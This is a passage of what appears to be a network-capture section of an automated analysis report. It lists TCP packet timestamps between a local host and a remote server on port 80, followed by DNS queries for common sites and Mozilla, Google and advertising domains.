Jul 26, 2024 20:09:17.765976906 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 20:09:17.765993118 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 20:09:17.766009092 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 20:09:17.766027927 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 20:09:17.766031027 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:09:17.766057968 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:09:17.766072035 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:09:17.766714096 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 20:09:17.766777992 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 20:09:17.766834021 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:09:17.766916037 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 20:09:17.766931057 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 20:09:17.766944885 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 20:09:17.766969919 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:09:17.766987085 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:09:17.767366886 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 20:09:17.767381907 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 20:09:17.767396927 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 20:09:17.767410994 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 20:09:17.767426968 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:09:17.767427921 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 20:09:17.767442942 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 20:09:17.767457962 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:09:17.767469883 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:09:17.767493010 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:09:17.768239021 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 20:09:17.768254995 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 20:09:17.768269062 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 20:09:17.768285036 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 20:09:17.768285990 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:09:17.768300056 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 20:09:17.768300056 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:09:17.768315077 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 20:09:17.768323898 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:09:17.768345118 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:09:17.769032001 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 20:09:17.769048929 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 20:09:17.769063950 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 20:09:17.769078970 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 20:09:17.769088984 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:09:17.769094944 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 20:09:17.769109964 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:09:17.769110918 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 20:09:17.769139051 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:09:17.769146919 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:09:17.769722939 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 20:09:17.769737005 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 20:09:17.769752026 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 20:09:17.769764900 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:09:17.769766092 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 20:09:17.769777060 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:09:17.769782066 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 20:09:17.769797087 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 20:09:17.769802094 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:09:17.769829988 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:09:17.769856930 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:09:17.770523071 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 20:09:17.770582914 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:09:17.789685011 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 20:09:17.789715052 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 20:09:17.789730072 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 20:09:17.789737940 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:09:17.789752007 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:09:17.789767027 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:09:17.790056944 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 20:09:17.790072918 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 20:09:17.790087938 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 20:09:17.790101051 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:09:17.790102959 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 20:09:17.790126085 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:09:17.790144920 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:09:17.790534973 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 20:09:17.790549994 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 20:09:17.790564060 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 20:09:17.790579081 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 20:09:17.790590048 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:09:17.790594101 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 20:09:17.790607929 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 20:09:17.790612936 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:09:17.790621042 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:09:17.790622950 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 20:09:17.790647030 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:09:17.790657997 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:09:17.791384935 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 20:09:17.791400909 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 20:09:17.791414976 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 20:09:17.791429996 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 20:09:17.791440964 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:09:17.791445017 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 20:09:17.791460037 CEST	80	49705	185.215.113.16	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jul 26, 2024 20:10:11.451464891 CEST	192.168.2.5	1.1.1.1	0xf07e	Standard query (0)	www.youtube.com	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:10:11.451601982 CEST	192.168.2.5	1.1.1.1	0x71c9	Standard query (0)	www.youtube.com	65	IN (0x0001)	false
Jul 26, 2024 20:10:14.423435926 CEST	192.168.2.5	1.1.1.1	0x3be5	Standard query (0)	www.youtube.com	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:10:14.424417019 CEST	192.168.2.5	1.1.1.1	0x88bf	Standard query (0)	www.youtube.com	65	IN (0x0001)	false
Jul 26, 2024 20:10:15.852018118 CEST	192.168.2.5	1.1.1.1	0x8e5e	Standard query (0)	bzib.nelreports.net	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:10:15.852140903 CEST	192.168.2.5	1.1.1.1	0x1939	Standard query (0)	bzib.nelreports.net	65	IN (0x0001)	false
Jul 26, 2024 20:10:18.935415983 CEST	192.168.2.5	1.1.1.1	0xba82	Standard query (0)	chrome.cloudflare-dns.com	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:10:18.935573101 CEST	192.168.2.5	1.1.1.1	0x1dfe	Standard query (0)	chrome.cloudflare-dns.com	65	IN (0x0001)	false
Jul 26, 2024 20:10:18.935843945 CEST	192.168.2.5	1.1.1.1	0x5d3b	Standard query (0)	chrome.cloudflare-dns.com	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:10:18.936002970 CEST	192.168.2.5	1.1.1.1	0xe40a	Standard query (0)	chrome.cloudflare-dns.com	65	IN (0x0001)	false
Jul 26, 2024 20:10:18.969093084 CEST	192.168.2.5	1.1.1.1	0xc5ee	Standard query (0)	chrome.cloudflare-dns.com	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:10:18.969192028 CEST	192.168.2.5	1.1.1.1	0x5e3b	Standard query (0)	chrome.cloudflare-dns.com	65	IN (0x0001)	false
Jul 26, 2024 20:10:19.605232000 CEST	192.168.2.5	1.1.1.1	0xba81	Standard query (0)	clients2.googleusercontent.com	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:10:19.605485916 CEST	192.168.2.5	1.1.1.1	0x1082	Standard query (0)	clients2.googleusercontent.com	65	IN (0x0001)	false
Jul 26, 2024 20:10:21.732641935 CEST	192.168.2.5	1.1.1.1	0xd815	Standard query (0)	prod.classify-client.prod.webservices.mozgcp.net	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:10:21.745270967 CEST	192.168.2.5	1.1.1.1	0x2d12	Standard query (0)	prod.classify-client.prod.webservices.mozgcp.net	28	IN (0x0001)	false
Jul 26, 2024 20:10:22.279419899 CEST	192.168.2.5	1.1.1.1	0x58af	Standard query (0)	detectportal.firefox.com	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:10:22.295846939 CEST	192.168.2.5	1.1.1.1	0x6e38	Standard query (0)	prod.detectportal.prod.cloudops.mozgcp.net	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:10:22.330480099 CEST	192.168.2.5	1.1.1.1	0xf1a6	Standard query (0)	prod.detectportal.prod.cloudops.mozgcp.net	28	IN (0x0001)	false
Jul 26, 2024 20:10:23.944772959 CEST	192.168.2.5	1.1.1.1	0x2ed5	Standard query (0)	example.org	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:10:23.982884884 CEST	192.168.2.5	1.1.1.1	0xb416	Standard query (0)	ipv4only.arpa	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:10:24.002588034 CEST	192.168.2.5	1.1.1.1	0xb4f	Standard query (0)	detectportal.firefox.com	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:10:24.727026939 CEST	192.168.2.5	1.1.1.1	0x6714	Standard query (0)	accounts.youtube.com	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:10:24.727160931 CEST	192.168.2.5	1.1.1.1	0xb8fa	Standard query (0)	accounts.youtube.com	65	IN (0x0001)	false
Jul 26, 2024 20:10:27.309685946 CEST	192.168.2.5	1.1.1.1	0xe4af	Standard query (0)	play.google.com	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:10:27.309839964 CEST	192.168.2.5	1.1.1.1	0x3266	Standard query (0)	play.google.com	65	IN (0x0001)	false
Jul 26, 2024 20:10:29.247561932 CEST	192.168.2.5	1.1.1.1	0x1a7c	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:10:29.247699022 CEST	192.168.2.5	1.1.1.1	0xdcca	Standard query (0)	www.google.com	65	IN (0x0001)	false
Jul 26, 2024 20:10:31.919886112 CEST	192.168.2.5	1.1.1.1	0x9b64	Standard query (0)	www.youtube.com	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:10:31.939302921 CEST	192.168.2.5	1.1.1.1	0xcf43	Standard query (0)	youtube-ui.l.google.com	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:10:31.947797060 CEST	192.168.2.5	1.1.1.1	0xf43e	Standard query (0)	youtube-ui.l.google.com	28	IN (0x0001)	false
Jul 26, 2024 20:10:34.288546085 CEST	192.168.2.5	1.1.1.1	0x1e0d	Standard query (0)	detectportal.firefox.com	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:10:34.291409969 CEST	192.168.2.5	1.1.1.1	0x41e7	Standard query (0)	content-signature-2.cdn.mozilla.net	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:10:34.301693916 CEST	192.168.2.5	1.1.1.1	0xc8e5	Standard query (0)	prod.content-signature-chains.prod.webservices.mozgcp.net	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:10:34.316920042 CEST	192.168.2.5	1.1.1.1	0x3648	Standard query (0)	prod.content-signature-chains.prod.webservices.mozgcp.net	28	IN (0x0001)	false
Jul 26, 2024 20:10:34.780241013 CEST	192.168.2.5	1.1.1.1	0x2633	Standard query (0)	mitmdetection.services.mozilla.com	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:10:34.810154915 CEST	192.168.2.5	1.1.1.1	0x3cb2	Standard query (0)	mitmdetection.services.mozilla.com	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:10:34.821456909 CEST	192.168.2.5	1.1.1.1	0xdaf5	Standard query (0)	mitmdetection.services.mozilla.com	28	IN (0x0001)	false
Jul 26, 2024 20:10:37.537179947 CEST	192.168.2.5	1.1.1.1	0xfe94	Standard query (0)	o.pki.goog	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:10:37.545233965 CEST	192.168.2.5	1.1.1.1	0x959a	Standard query (0)	pki-goog.l.google.com	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:10:37.552869081 CEST	192.168.2.5	1.1.1.1	0x76cd	Standard query (0)	pki-goog.l.google.com	28	IN (0x0001)	false
Jul 26, 2024 20:10:39.213871002 CEST	192.168.2.5	1.1.1.1	0xd66b	Standard query (0)	support.mozilla.org	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:10:39.241745949 CEST	192.168.2.5	1.1.1.1	0xf628	Standard query (0)	us-west1.prod.sumo.prod.webservices.mozgcp.net	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:10:39.251884937 CEST	192.168.2.5	1.1.1.1	0xfd1	Standard query (0)	us-west1.prod.sumo.prod.webservices.mozgcp.net	28	IN (0x0001)	false
Jul 26, 2024 20:10:44.090298891 CEST	192.168.2.5	1.1.1.1	0x561e	Standard query (0)	accounts.youtube.com	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:10:44.101248026 CEST	192.168.2.5	1.1.1.1	0x18eb	Standard query (0)	www3.l.google.com	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:10:44.109704971 CEST	192.168.2.5	1.1.1.1	0x321a	Standard query (0)	www3.l.google.com	28	IN (0x0001)	false
Jul 26, 2024 20:10:44.700913906 CEST	192.168.2.5	1.1.1.1	0xc348	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:10:44.710786104 CEST	192.168.2.5	1.1.1.1	0xe83e	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:10:44.718848944 CEST	192.168.2.5	1.1.1.1	0x8901	Standard query (0)	www.google.com	28	IN (0x0001)	false
Jul 26, 2024 20:10:45.005924940 CEST	192.168.2.5	1.1.1.1	0xe1d6	Standard query (0)	play.google.com	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:10:45.015696049 CEST	192.168.2.5	1.1.1.1	0xf82b	Standard query (0)	play.google.com	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:10:45.023363113 CEST	192.168.2.5	1.1.1.1	0x7860	Standard query (0)	play.google.com	28	IN (0x0001)	false
Jul 26, 2024 20:10:48.842504978 CEST	192.168.2.5	1.1.1.1	0x668d	Standard query (0)	contile.services.mozilla.com	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:10:48.844042063 CEST	192.168.2.5	1.1.1.1	0xde64	Standard query (0)	spocs.getpocket.com	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:10:48.855818033 CEST	192.168.2.5	1.1.1.1	0x1ce8	Standard query (0)	contile.services.mozilla.com	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:10:48.856520891 CEST	192.168.2.5	1.1.1.1	0xe879	Standard query (0)	prod.balrog.prod.cloudops.mozgcp.net	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:10:48.856738091 CEST	192.168.2.5	1.1.1.1	0xe85d	Standard query (0)	prod.ads.prod.webservices.mozgcp.net	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:10:48.866055012 CEST	192.168.2.5	1.1.1.1	0x9476	Standard query (0)	contile.services.mozilla.com	28	IN (0x0001)	false
Jul 26, 2024 20:10:48.866470098 CEST	192.168.2.5	1.1.1.1	0x2379	Standard query (0)	prod.balrog.prod.cloudops.mozgcp.net	28	IN (0x0001)	false
Jul 26, 2024 20:10:48.866648912 CEST	192.168.2.5	1.1.1.1	0xc0f4	Standard query (0)	prod.ads.prod.webservices.mozgcp.net	28	IN (0x0001)	false
Jul 26, 2024 20:10:49.613872051 CEST	192.168.2.5	1.1.1.1	0x9269	Standard query (0)	firefox.settings.services.mozilla.com	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:10:49.616832018 CEST	192.168.2.5	1.1.1.1	0xd880	Standard query (0)	shavar.services.mozilla.com	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:10:49.624296904 CEST	192.168.2.5	1.1.1.1	0xec4d	Standard query (0)	prod.remote-settings.prod.webservices.mozgcp.net	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:10:49.639377117 CEST	192.168.2.5	1.1.1.1	0x8249	Standard query (0)	prod.remote-settings.prod.webservices.mozgcp.net	28	IN (0x0001)	false
Jul 26, 2024 20:10:50.360351086 CEST	192.168.2.5	1.1.1.1	0xc1b3	Standard query (0)	r10.o.lencr.org	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:10:50.515708923 CEST	192.168.2.5	1.1.1.1	0xff52	Standard query (0)	r3.o.lencr.org	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:10:50.774894953 CEST	192.168.2.5	1.1.1.1	0xc37d	Standard query (0)	getpocket.cdn.mozilla.net	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:10:50.804666042 CEST	192.168.2.5	1.1.1.1	0xc37d	Standard query (0)	getpocket.cdn.mozilla.net	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:10:50.940711975 CEST	192.168.2.5	1.1.1.1	0xae2	Standard query (0)	prod.pocket.prod.cloudops.mozgcp.net	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:10:50.952833891 CEST	192.168.2.5	1.1.1.1	0x83df	Standard query (0)	prod.pocket.prod.cloudops.mozgcp.net	28	IN (0x0001)	false
Jul 26, 2024 20:10:53.441957951 CEST	192.168.2.5	1.1.1.1	0xb5fc	Standard query (0)	r11.o.lencr.org	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:10:53.481092930 CEST	192.168.2.5	1.1.1.1	0x2140	Standard query (0)	firefox-api-proxy.cdn.mozilla.net	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:10:53.511363029 CEST	192.168.2.5	1.1.1.1	0x3f38	Standard query (0)	firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:10:53.519639969 CEST	192.168.2.5	1.1.1.1	0x8354	Standard query (0)	firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net	28	IN (0x0001)	false
Jul 26, 2024 20:10:54.320472956 CEST	192.168.2.5	1.1.1.1	0xb744	Standard query (0)	push.services.mozilla.com	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:10:55.542409897 CEST	192.168.2.5	1.1.1.1	0x8602	Standard query (0)	telemetry-incoming.r53-2.services.mozilla.com	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:10:55.551213026 CEST	192.168.2.5	1.1.1.1	0xcdac	Standard query (0)	telemetry-incoming.r53-2.services.mozilla.com	28	IN (0x0001)	false
Jul 26, 2024 20:10:59.819804907 CEST	192.168.2.5	1.1.1.1	0x4068	Standard query (0)	r11.o.lencr.org	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:11:00.073575020 CEST	192.168.2.5	1.1.1.1	0xdca	Standard query (0)	prod.balrog.prod.cloudops.mozgcp.net	28	IN (0x0001)	false
Jul 26, 2024 20:11:00.212907076 CEST	192.168.2.5	1.1.1.1	0x8ab	Standard query (0)	services.addons.mozilla.org	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:11:00.236398935 CEST	192.168.2.5	1.1.1.1	0x549c	Standard query (0)	services.addons.mozilla.org	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:11:00.250641108 CEST	192.168.2.5	1.1.1.1	0xc311	Standard query (0)	services.addons.mozilla.org	28	IN (0x0001)	false
Jul 26, 2024 20:11:00.646161079 CEST	192.168.2.5	1.1.1.1	0x7a7	Standard query (0)	telemetry-incoming.r53-2.services.mozilla.com	28	IN (0x0001)	false
Jul 26, 2024 20:11:01.273102045 CEST	192.168.2.5	1.1.1.1	0x7a0b	Standard query (0)	tiles-cdn.prod.ads.prod.webservices.mozgcp.net	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:11:01.295288086 CEST	192.168.2.5	1.1.1.1	0x17e9	Standard query (0)	tiles-cdn.prod.ads.prod.webservices.mozgcp.net	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:11:01.308500051 CEST	192.168.2.5	1.1.1.1	0xdcc3	Standard query (0)	tiles-cdn.prod.ads.prod.webservices.mozgcp.net	28	IN (0x0001)	false
Jul 26, 2024 20:11:01.327776909 CEST	192.168.2.5	1.1.1.1	0x1365	Standard query (0)	img-getpocket.cdn.mozilla.net	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:11:01.342015982 CEST	192.168.2.5	1.1.1.1	0xcf08	Standard query (0)	img-prod.pocket.prod.cloudops.mozgcp.net	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:11:01.355144978 CEST	192.168.2.5	1.1.1.1	0xc815	Standard query (0)	img-prod.pocket.prod.cloudops.mozgcp.net	28	IN (0x0001)	false
Jul 26, 2024 20:11:02.392049074 CEST	192.168.2.5	1.1.1.1	0x34f4	Standard query (0)	firefox-settings-attachments.cdn.mozilla.net	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:11:02.433969975 CEST	192.168.2.5	1.1.1.1	0xeb14	Standard query (0)	attachments.prod.remote-settings.prod.webservices.mozgcp.net	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:11:02.461589098 CEST	192.168.2.5	1.1.1.1	0xeb14	Standard query (0)	attachments.prod.remote-settings.prod.webservices.mozgcp.net	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:11:02.514760971 CEST	192.168.2.5	1.1.1.1	0x2c05	Standard query (0)	attachments.prod.remote-settings.prod.webservices.mozgcp.net	28	IN (0x0001)	false
Jul 26, 2024 20:11:03.270479918 CEST	192.168.2.5	1.1.1.1	0xc9e	Standard query (0)	www.expedia.com	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:11:03.271497011 CEST	192.168.2.5	1.1.1.1	0xff7b	Standard query (0)	www.amazon.com	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:11:03.271497011 CEST	192.168.2.5	1.1.1.1	0x2d49	Standard query (0)	www.facebook.com	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:11:03.279422998 CEST	192.168.2.5	1.1.1.1	0x937c	Standard query (0)	star-mini.c10r.facebook.com	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:11:03.279488087 CEST	192.168.2.5	1.1.1.1	0x9e83	Standard query (0)	d3ag4hukkh62yn.cloudfront.net	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:11:03.286621094 CEST	192.168.2.5	1.1.1.1	0xa054	Standard query (0)	star-mini.c10r.facebook.com	28	IN (0x0001)	false
Jul 26, 2024 20:11:03.287486076 CEST	192.168.2.5	1.1.1.1	0x5a9a	Standard query (0)	d3ag4hukkh62yn.cloudfront.net	28	IN (0x0001)	false
Jul 26, 2024 20:11:03.294998884 CEST	192.168.2.5	1.1.1.1	0x1827	Standard query (0)	www.reddit.com	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:11:03.297718048 CEST	192.168.2.5	1.1.1.1	0x71e7	Standard query (0)	www.wikipedia.org	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:11:03.298460960 CEST	192.168.2.5	1.1.1.1	0xb779	Standard query (0)	twitter.com	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:11:03.302453995 CEST	192.168.2.5	1.1.1.1	0x3da2	Standard query (0)	reddit.map.fastly.net	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:11:03.306049109 CEST	192.168.2.5	1.1.1.1	0x3d06	Standard query (0)	dyna.wikimedia.org	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:11:03.307276011 CEST	192.168.2.5	1.1.1.1	0x2e71	Standard query (0)	twitter.com	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:11:03.311042070 CEST	192.168.2.5	1.1.1.1	0x99f8	Standard query (0)	reddit.map.fastly.net	28	IN (0x0001)	false
Jul 26, 2024 20:11:03.314023972 CEST	192.168.2.5	1.1.1.1	0x4138	Standard query (0)	dyna.wikimedia.org	28	IN (0x0001)	false
Jul 26, 2024 20:11:03.315311909 CEST	192.168.2.5	1.1.1.1	0x859c	Standard query (0)	twitter.com	28	IN (0x0001)	false
Jul 26, 2024 20:11:03.319380999 CEST	192.168.2.5	1.1.1.1	0x4f3a	Standard query (0)	getpocket.com	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:11:03.322798014 CEST	192.168.2.5	1.1.1.1	0xb32c	Standard query (0)	market-trk.com	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:11:03.329601049 CEST	192.168.2.5	1.1.1.1	0x5a9e	Standard query (0)	getpocket.com	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:11:03.335016966 CEST	192.168.2.5	1.1.1.1	0xa3f2	Standard query (0)	market-trk.com	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:11:03.338767052 CEST	192.168.2.5	1.1.1.1	0x9f3a	Standard query (0)	getpocket.com	28	IN (0x0001)	false
Jul 26, 2024 20:11:03.341734886 CEST	192.168.2.5	1.1.1.1	0x99bb	Standard query (0)	www.mozorg.moz.works	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:11:03.346796036 CEST	192.168.2.5	1.1.1.1	0x1cbd	Standard query (0)	www.romper.com	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:11:03.348233938 CEST	192.168.2.5	1.1.1.1	0xa15d	Standard query (0)	market-trk.com	28	IN (0x0001)	false
Jul 26, 2024 20:11:03.352296114 CEST	192.168.2.5	1.1.1.1	0x25c6	Standard query (0)	www.mozorg.moz.works	28	IN (0x0001)	false
Jul 26, 2024 20:11:03.356250048 CEST	192.168.2.5	1.1.1.1	0xaf5e	Standard query (0)	www.romper.com	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:11:03.361366034 CEST	192.168.2.5	1.1.1.1	0x1f6e	Standard query (0)	www.wired.com	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:11:03.361520052 CEST	192.168.2.5	1.1.1.1	0xc60b	Standard query (0)	www.themarshallproject.org	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:11:03.373832941 CEST	192.168.2.5	1.1.1.1	0xcb81	Standard query (0)	www.themarshallproject.org	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:11:03.377105951 CEST	192.168.2.5	1.1.1.1	0x124d	Standard query (0)	www.romper.com	28	IN (0x0001)	false
Jul 26, 2024 20:11:03.385323048 CEST	192.168.2.5	1.1.1.1	0x46af	Standard query (0)	www.wired.com	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:11:03.385819912 CEST	192.168.2.5	1.1.1.1	0x619e	Standard query (0)	www.themarshallproject.org	28	IN (0x0001)	false
Jul 26, 2024 20:11:03.389657974 CEST	192.168.2.5	1.1.1.1	0x6017	Standard query (0)	ww55.affinity.net	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:11:03.398241043 CEST	192.168.2.5	1.1.1.1	0x31f3	Standard query (0)	ww55.affinity.net	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:11:03.407223940 CEST	192.168.2.5	1.1.1.1	0x2978	Standard query (0)	ww55.affinity.net	28	IN (0x0001)	false
